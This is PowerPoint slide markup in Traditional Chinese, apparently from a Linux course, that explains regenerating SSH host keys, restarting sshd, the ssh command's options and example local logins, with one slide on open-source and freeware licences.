                        <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="細明體"/>
                        </a:rPr>
                        <a:t>&lt;==</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="777777"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="細明體"/>
                        </a:rPr>
                        <a:t>底下三個步驟重新產生金鑰！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zh-TW" altLang="en-US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正在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產生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2 RSA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主機金鑰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: [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確定 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]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zh-TW" altLang="en-US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正在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產生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2 DSA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主機金鑰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: [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確定 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]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zh-TW" altLang="en-US" sz="20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正在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啟動 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="20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d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: [ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US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確定 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="20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] </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-TW" sz="20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09750" y="2813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  <a:cs typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1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  <a:cs typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
            </a:b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6793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檢查</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>伺服器端成對的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>公鑰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與私</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>鑰</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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dirty="0"/>
              <a:t>產生新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>公鑰</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與私鑰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5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574387"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="479579" y="2040310"/>
          <a:ext cx="8579296" cy="3312368"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="8579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2368"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[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@ww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~]# </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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date; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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ll</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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 /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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b="1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b="1" dirty="0" err="1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ssh_host</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean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*</a:t>
                      </a:r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Mon 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Jul 25 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800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11:36:12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CST 2011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----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668 Jul 25 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFF00"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="細明體"/>
                        </a:rPr>
                        <a:t>11:35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_host_dsa_key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r--r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590 Jul 25 11:35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ssh_host_dsa_key.pub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----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963 Jul 25 11:35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_host_key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r--r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627 Jul 25 11:35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ssh_host_key.pub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----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1675 Jul 25 11:35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_host_rsa_key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  <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="細明體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w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-r--r--. 1 root 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root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382 Jul 25 11:35 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etc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ssh</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr 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/ssh_host_rsa_key.pub </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="細明體"/>
                        </a:rPr>
                        <a:t># </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF6666"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="細明體"/>
                        </a:rPr>
                        <a:t>看一下上面輸出的日期與檔案的建立時間，剛剛建立的新公鑰、私鑰系統！</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="細明體"/>
                        </a:rPr>
                        <a:t> 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09750" y="2813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  <a:cs typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr kumimoji="1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  <a:cs typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
            </a:b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0897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(Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>SHell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> (Port:22)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>啟動本機</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>SSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>服務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Server)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端服務</a:t>
            </a:r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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW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827584" y="2370366"/>
            <a:ext cx="763284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/etc/init.d/sshd restart</a:t>
            </a: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</a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="1600" b="1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27584" y="2708920"/>
            <a:ext cx="763284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netstat -tlnp | grep ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="1600" b="1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27584" y="3060249"/>
            <a:ext cx="763284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Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 :::</a:t>
            </a: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22</a:t>
            </a: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 :::* LISTEN 1539/sshd</a:t>
            </a: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effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="16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27584" y="4031119"/>
            <a:ext cx="6336704" cy="267765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[root@www ~]# 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ssh [-f] [-o 參數項目] [-p 非正規埠口] [帳號@]IP [指令]</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="1400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>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選項與參數：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lvl="0" eaLnBrk="0" hangingPunct="0"/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f ：不</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW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遠端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登入主機直接發送一個指令過去；</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW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需要配合後面的 [指令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW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]</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="140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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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  PS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW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.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US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強迫在遠端主機執行指令</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW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r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>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o 參數項目：主要的參數項目有：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ConnectTimeout=秒數 ：連線等待的秒數，減少等待的時間 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 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StrictHostKeyChecking=[yes|no|ask]：預設是 ask，若要讓 public key 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 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</a:t>
            </a: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主動加入 known_hosts ，則可以設定為 no 即可。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-p ：如果你的 sshd 服務啟動在非正規的埠口 (22)，需使用此項目</a:t>
            </a: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[指令] ：不登入遠端主機，直接發送指令過去。但與 -f 意義不相同</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US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。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                <a:latin typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
                <a:ea typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
              </a:rPr>
              <a:t>     PS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW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.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
                <a:ea typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
              </a:rPr>
              <a:t>因為要等到遠端主機跑完結果，所以畫面會有卡住的可能。</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="140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400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
                <a:ea typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
              </a:rPr>
              <a:t>    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effectLst/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筆跡 8"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2416680" y="2521080"/>
              <a:ext cx="2488680" cy="918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00840" y="2457720"/>
                <a:ext cx="252036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筆跡 9"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2390400" y="2926080"/>
              <a:ext cx="2462760" cy="46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74560" y="2862720"/>
                <a:ext cx="2494440" cy="17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40063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1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>連線登入到對方主機的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本機為例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/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>root@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ~]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> 127.0.0.1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is eb:12:07:84:b9:3b:3f:e4:ad:ba:f1:85:41:fc:18:3b. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" u="sng" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Are you sure you want to continue connecting (yes/no)?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:latin typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
                <a:ea typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Warning: Permanently added '127.0.0.1' (RSA) to the list of known hosts. root@127.0.0.1's password: &lt;==在這裡輸入 root 的密碼即可！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>root@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ~]# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>exit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33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範例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>連線登入到對方主機的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>本機為例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>authenticity of host '127.0.0.1 (127.0.0.1)' can't be established. RSA key fingerprint is eb:12:07:84:b9:3b:3f:e4:ad:ba:f1:85:41:fc:18:3b. </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" u="sng" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t>Are you sure you want to continue connecting (yes/no)?</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0">
                <a:latin typeface="Arial Unicode MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" sz="2800" b="1" dirty="0">
                <a:latin typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
                <a:ea typeface="細明體" panose="02020509000000000000" pitchFamily="49" charset="-120"/>
              </a:rPr>
              <a:t>yes</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>若接收的公鑰尚未記錄，則詢問使用者是否記錄。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>若要記錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>範例中回答 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>yes </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的那個步驟</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>則寫入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>known_hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>且繼續登入的後續工作；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>若不記錄 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>回答 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>no) </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>則不寫入該檔案，並且離開登入工作；</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0"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686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/>
              <a:t>範例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>帳號登入本機 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>root@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>~]# 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 student@127.0.0.1 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>student@127.0.0.1's password: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>student@www</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ~]$ exit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>由於加入帳號，因此切換身份成為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>student </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>了！另外，因為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>127.0.0.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>曾登入過。 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所以就不會再出現提示你要增加主機公鑰的訊息囉！ </a:t>
            </a:r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256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關於授權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pen Source(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>開放原始碼</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>)-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>代表授權為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>PGL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>BSD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GPL-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Stallman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>於</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>1984</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>年創立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>計畫與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>FSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>基金會發展版權宣言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>自由軟體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Close Source-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>僅推出可執行的二進位程式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Freeware-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>免費軟體非自由軟體，不見得會公布原始碼，也有可能藏有惡意程式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Shareware-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>共享軟體為具使用限制的軟體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374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/>
              <a:t>範例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>登入對方主機執行過指令後立刻離開的方式：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
